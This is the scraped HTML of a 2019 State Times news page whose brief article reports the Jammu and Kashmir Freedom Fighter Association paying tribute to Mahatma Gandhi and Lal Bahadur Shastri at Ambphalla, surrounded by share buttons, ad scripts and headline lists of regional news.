onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/&title=Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2019/10/JKFFA-1024x576.jpg&amp;
url=http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/&amp;
is_video=false&amp;description=Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

<br>    
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe width="500" height="281" src="https://www.youtube.com/embed/ZQ7Y49WBdZI?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
</div></figure>



<p>Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri at Dogra Shourya Samarak, Ambphalla</p>
      

    
		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-628 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-628 .mom-e3lanat-inner').boxSlider({
				autoScroll: false,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-628 .adr-next',
				prev: '.e3lanat-rotator-id-628 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-628" style="width:320px; height:100px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="8540" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- mobile one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:320px;height:100px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="6339736216"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
       <div class="mom-social-share ss-horizontal border-box php-share" data-id="530426">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri&url=http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/&title=Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2019/10/JKFFA-1024x576.jpg&amp;
url=http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/&amp;
is_video=false&amp;description=Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

</div> <!-- entry content -->
</div> <!-- base box -->

            <div class="np-posts">
                <ul>
			                    <li class="np-post prev border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/congress-leaders-pays-tribute-to-mahatma-gandhi-in-jammu/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/congress-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/congress-180x120.jpg" alt="Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/congress-leaders-pays-tribute-to-mahatma-gandhi-in-jammu/" class="link prev"><i class="fa-icon-double-angle-left"></i>Previous</a>
                            <h3><a href="http://news.statetimes.in/congress-leaders-pays-tribute-to-mahatma-gandhi-in-jammu/">Congress Leaders pays tribute to Mahatma Gandhi in Jammu</a></h3>
                        </div>
                    </li>
		    		                    </ul>
            </div> <!-- np posts -->
		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="322174" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:block"
     data-ad-format="autorelaxed"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4609961952"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                <h2 class="single-title">Related Articles</h2>
            <div class="base-box single-box">
                <ul class="single-related-posts">
	   	     	       <li>
			                        <a href="http://news.statetimes.in/congress-leaders-pays-tribute-to-mahatma-gandhi-in-jammu/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/congress-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/congress-610x380.jpg" alt="Congress Leaders pays tribute to Mahatma Gandhi in Jammu"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/congress-leaders-pays-tribute-to-mahatma-gandhi-in-jammu/">Congress Leaders pays tribute to Mahatma Gandhi in Jammu</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2019-10-02T12:18:20+00:00">October 02, 2019</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/deadline-for-up-gradation-of-ma-stadium-missed-jammuites-to-wait-for-ipl-till-next-session/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/MA-Stadium-1024x576.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/MA-Stadium-1024x576.jpg" alt="Deadline for up-gradation of MA Stadium missed: Jammuites to wait for IPL till next session"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/deadline-for-up-gradation-of-ma-stadium-missed-jammuites-to-wait-for-ipl-till-next-session/">Deadline for up-gradation of MA Stadium missed: Jammuites to wait for IPL till next session</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2019-10-01T15:23:47+00:00">October 01, 2019</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/breaking-news-huge-quantity-of-rdx-recovered-from-a-bus-near-mla-hostel-in-jammu/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/RDX-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/RDX-610x380.jpg" alt="BREAKING NEWS: Huge quantity of RDX recovered from a bus near MLA hostel in Jammu."></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/breaking-news-huge-quantity-of-rdx-recovered-from-a-bus-near-mla-hostel-in-jammu/">BREAKING NEWS: Huge quantity of RDX recovered from a bus near MLA hostel in Jammu.</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2019-10-01T12:12:39+00:00">October 01, 2019</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/jammu-central-mahajan-sabha-to-celebrate-153rd-birth-anniversary-of-lala-hans-raj-mahajan/"><img src="http://news.statetimes.in/wp-content/uploads/2019/09/Mahajan-Sabha.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/09/Mahajan-Sabha.jpg" alt="Jammu Central Mahajan Sabha to celebrate 153rd birth anniversary of Lala Hans Raj Mahajan"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/jammu-central-mahajan-sabha-to-celebrate-153rd-birth-anniversary-of-lala-hans-raj-mahajan/">Jammu Central Mahajan Sabha to celebrate 153rd birth anniversary of Lala Hans Raj Mahajan</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2019-09-30T14:13:58+00:00">September 30, 2019</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/bdc-polls-should-be-conducted-on-non-party-basis-all-jk-panchayat-conference/"><img src="http://news.statetimes.in/wp-content/uploads/2019/09/AJKPC.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/09/AJKPC.jpg" alt="BDC polls should be conducted on non-party basis: All J&K Panchayat Conference"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/bdc-polls-should-be-conducted-on-non-party-basis-all-jk-panchayat-conference/">BDC polls should be conducted on non-party basis: All J&#038;K Panchayat Conference</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2019-09-30T14:13:12+00:00">September 30, 2019</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/jk-nav-nirman-party-launched-in-jammu/"><img src="http://news.statetimes.in/wp-content/uploads/2019/09/Nirman.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/09/Nirman.jpg" alt="J&K Nav Nirman Party launched in Jammu"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/jk-nav-nirman-party-launched-in-jammu/">J&#038;K Nav Nirman Party launched in Jammu</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2019-09-30T14:12:12+00:00">September 30, 2019</time>
			</div>
                </li>

</ul>
</div>

<div id="comments" class="comments-area">

	
		
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/#respond" style="display:none;">Cancel Reply</a></small></h3>			<form action="http://news.statetimes.in/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><textarea id="comment" placeholder="Comment..." name="comment" cols="45" rows="8" aria-required="true"></textarea></p><input id="author" name="author" type="text" placeholder="Name (required)" value="" size="30" aria-required='true' />
<input id="email" name="email" type="text" placeholder="Email (required)" value="" size="30" aria-required='true' />
<input id="url" name="url" type="text" placeholder="Website" value="" size="30" />
<p class="form-submit"><input name="submit" type="submit" id="submit-comment" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='530426' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="ea5cc713df" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="191"/></p>			</form>
			</div><!-- #respond -->
	
</div><!-- #comments .comments-area -->
            </div> <!--main column-->
                      <div class="sidebar secondary-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-posts_list"><div class="widget-head"><h3 class="widget-title"><span>Latest News</span></h3></div>		<ul>
		
			<li><a href="http://news.statetimes.in/india-us-to-launch-new-clean-energy-initiative-to-fuel-economic-growth-in-indo-pacific/">India, US to launch new clean energy initiative to fuel economic growth in Indo-Pacific</a></li>

			
			<li><a href="http://news.statetimes.in/tade-who-won-rs-1-cr-on-kbc-made-poll-campaign-ambassador/">Tade, who won Rs 1 cr on KBC, made poll campaign ambassador</a></li>

			
			<li><a href="http://news.statetimes.in/president-pm-modi-pay-homage-to-mahatma-gandhi-on-his-150th-birth-anniversary/">President, PM Modi pay homage to Mahatma Gandhi on his 150th birth anniversary</a></li>

			
			<li><a href="http://news.statetimes.in/north-korea-fires-ballistic-missile-ahead-of-nuclear-talks/">North Korea fires ballistic missile ahead of nuclear talks</a></li>

			
			<li><a href="http://news.statetimes.in/shah-urges-people-to-shun-single-use-plastic/">Shah urges people to shun single-use plastic</a></li>

			
			<li><a href="http://news.statetimes.in/mahatma-gandhi-showed-love-for-non-violence-is-only-way-to-defeat-hatred-rahul/">Mahatma Gandhi showed love for non-violence is only way to defeat hatred: Rahul</a></li>

			
			<li><a href="http://news.statetimes.in/1st-test-india-win-toss-elect-to-bat/">1st Test: India win toss, elect to bat</a></li>

			
			<li><a href="http://news.statetimes.in/markets-extend-fall-to-3rd-day-yes-bank-crashes-22-pc/">Markets extend fall to 3rd day; Yes Bank crashes 22 pc</a></li>

			
			<li><a href="http://news.statetimes.in/pakistan-hands-over-body-of-bsf-trooper-who-drowned-in-river-along-ib/">Pakistan hands over body of BSF trooper who drowned in river along IB</a></li>

			
			<li><a href="http://news.statetimes.in/body-of-unidentified-terrorist-found-in-ganderbal/">Body of unidentified terrorist found in Ganderbal</a></li>

			
			<li><a href="http://news.statetimes.in/multi-tier-security-along-20-infiltration-routes-in-jk/">Multi-tier security along 20 infiltration routes in J&#038;K</a></li>

			
			<li><a href="http://news.statetimes.in/explosive-like-substance-recovered-from-bus-in-jammu-2-persons-from-kashmir-detained/">Explosive-like substance recovered from bus in Jammu, 2 persons from Kashmir detained</a></li>

			
			<li><a href="http://news.statetimes.in/durbar-move-offices-to-close-at-srinagar-on-oct-25-reopen-in-jammu-on-nov-4/">Durbar move offices to close at Srinagar on Oct 25: reopen in Jammu on Nov 4</a></li>

			
			<li><a href="http://news.statetimes.in/air-marshal-h-s-arora-takes-charge-as-vice-chief-of-air-staff/">Air Marshal H S Arora takes charge as Vice Chief of Air Staff</a></li>

			
			<li><a href="http://news.statetimes.in/move-offices-to-close-in-srinagar-on-oct-25-26-to-reopen-in-jammu-on-nov-4/">Move offices to close in Srinagar on Oct 25-26, to reopen in Jammu on Nov 4</a></li>

											</ul>
</div>
            </div> <!--main sidebar-->
            <div class="clear"></div>
            <div class="clear"></div>
</div> <!--main container-->            
            <div class="sidebar main-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-ads">		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="4677" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- sidebar one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:250px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="5446915816"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
</div><div class="widget widget_momizattabber">                        <div class="main_tabs">
                            <ul class="tabs"></ul>
                            <div class="tabs-content-wrap">
                                <div class="tab-content"><a href="#" class="mom-tw-title">Top Stories</a>                                   <div class="mom-posts-widget">

					<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/art-370-abrogation-sc-rules-out-status-quo/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/SCCCCCCCCCCCCCCC.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/SCCCCCCCCCCCCCCC.jpg" alt="Art 370 abrogation; SC rules out status quo" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/art-370-abrogation-sc-rules-out-status-quo/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/SCCCCCCCCCCCCCCC.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/SCCCCCCCCCCCCCCC.jpg" alt="Art 370 abrogation; SC rules out status quo" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/art-370-abrogation-sc-rules-out-status-quo/">Art 370 abrogation; SC rules out status quo</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-10-02T00:45:48+00:00" class="entry-date">October 02, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/darbar-move-on-oct-25-to-reopen-in-jammu-on-nov-4/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Darbar Move on Oct 25, to reopen in Jammu on Nov 4" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/darbar-move-on-oct-25-to-reopen-in-jammu-on-nov-4/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Darbar Move on Oct 25, to reopen in Jammu on Nov 4" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/darbar-move-on-oct-25-to-reopen-in-jammu-on-nov-4/">Darbar Move on Oct 25, to reopen in Jammu on Nov 4</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-10-02T00:45:32+00:00" class="entry-date">October 02, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/14-kg-explosive-recovered-from-bus-in-jammu-driver-among-three-nabbed/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/Bus-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/Bus-90x60.jpg" alt="14 Kg explosive recovered from bus in Jammu; driver among three nabbed" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/14-kg-explosive-recovered-from-bus-in-jammu-driver-among-three-nabbed/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/Bus-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/Bus-180x120.jpg" alt="14 Kg explosive recovered from bus in Jammu; driver among three nabbed" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/14-kg-explosive-recovered-from-bus-in-jammu-driver-among-three-nabbed/">14 Kg explosive recovered from bus in Jammu; driver among three nabbed</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-10-02T00:44:10+00:00" class="entry-date">October 02, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/kashmiris-may-lynch-former-rulers-over-graft-lekhi/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Kashmiris may lynch former rulers over graft: Lekhi" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/kashmiris-may-lynch-former-rulers-over-graft-lekhi/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Kashmiris may lynch former rulers over graft: Lekhi" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/kashmiris-may-lynch-former-rulers-over-graft-lekhi/">Kashmiris may lynch former rulers over graft: Lekhi</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-10-02T00:43:58+00:00" class="entry-date">October 02, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/bsf-jawan-among-two-injured-as-pak-targets-kathua-poonch/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/ceasefire.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/ceasefire.jpg" alt="BSF Jawan among two injured as Pak  targets Kathua, Poonch" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/bsf-jawan-among-two-injured-as-pak-targets-kathua-poonch/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/ceasefire.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/ceasefire.jpg" alt="BSF Jawan among two injured as Pak  targets Kathua, Poonch" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/bsf-jawan-among-two-injured-as-pak-targets-kathua-poonch/">BSF Jawan among two injured as Pak  targets Kathua, Poonch</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-10-02T00:43:40+00:00" class="entry-date">October 02, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/ceo-issues-notification-for-bdcs-elections/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="CEO issues notification for BDCs elections" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/ceo-issues-notification-for-bdcs-elections/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="CEO issues notification for BDCs elections" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/ceo-issues-notification-for-bdcs-elections/">CEO issues notification for BDCs elections</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-10-02T00:43:14+00:00" class="entry-date">October 02, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/rubaiya-sayeed-kidnapping-case-tada-court-issues-non-bailable-warrants-against-shokat-javed/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Rubaiya Sayeed kidnapping case: TADA Court issues non-bailable warrants against Shokat, Javed" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/rubaiya-sayeed-kidnapping-case-tada-court-issues-non-bailable-warrants-against-shokat-javed/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Rubaiya Sayeed kidnapping case: TADA Court issues non-bailable warrants against Shokat, Javed" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/rubaiya-sayeed-kidnapping-case-tada-court-issues-non-bailable-warrants-against-shokat-javed/">Rubaiya Sayeed kidnapping case: TADA Court issues non-bailable warrants against Shokat, Javed</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-10-02T00:42:58+00:00" class="entry-date">October 02, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/wont-accept-third-party-mediation-on-kashmir-jaishankar/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/jaishankar-pti17919.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/jaishankar-pti17919.jpg" alt="Won’t accept third party mediation on Kashmir: Jaishankar" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/wont-accept-third-party-mediation-on-kashmir-jaishankar/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/jaishankar-pti17919.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/jaishankar-pti17919.jpg" alt="Won’t accept third party mediation on Kashmir: Jaishankar" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/wont-accept-third-party-mediation-on-kashmir-jaishankar/">Won’t accept third party mediation on Kashmir: Jaishankar</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-10-02T00:42:45+00:00" class="entry-date">October 02, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/nrc-must-for-national-security-will-be-implemented-shah/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/Shah-1.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/Shah-1.jpg" alt="NRC must for national security; will be implemented: Shah" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/nrc-must-for-national-security-will-be-implemented-shah/"><img src="http://news.statetimes.in/wp-content/uploads/2019/10/Shah-1.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/10/Shah-1.jpg" alt="NRC must for national security; will be implemented: Shah" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/nrc-must-for-national-security-will-be-implemented-shah/">NRC must for national security; will be implemented: Shah</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-10-02T00:42:29+00:00" class="entry-date">October 02, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/body-of-unidentified-terrorist-found-in-kangan/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Body of unidentified terrorist found in Kangan" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/body-of-unidentified-terrorist-found-in-kangan/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Body of unidentified terrorist found in Kangan" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/body-of-unidentified-terrorist-found-in-kangan/">Body of unidentified terrorist found in Kangan</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2019-10-02T00:42:16+00:00" class="entry-date">October 02, 2019</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/decks-cleared-for-national-law-university-in-j-guv-assents-to-proposed-bill/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Decks cleared for National Law University in J&K; Guv assents to proposed Bill" width="90" height="60"></a></div>
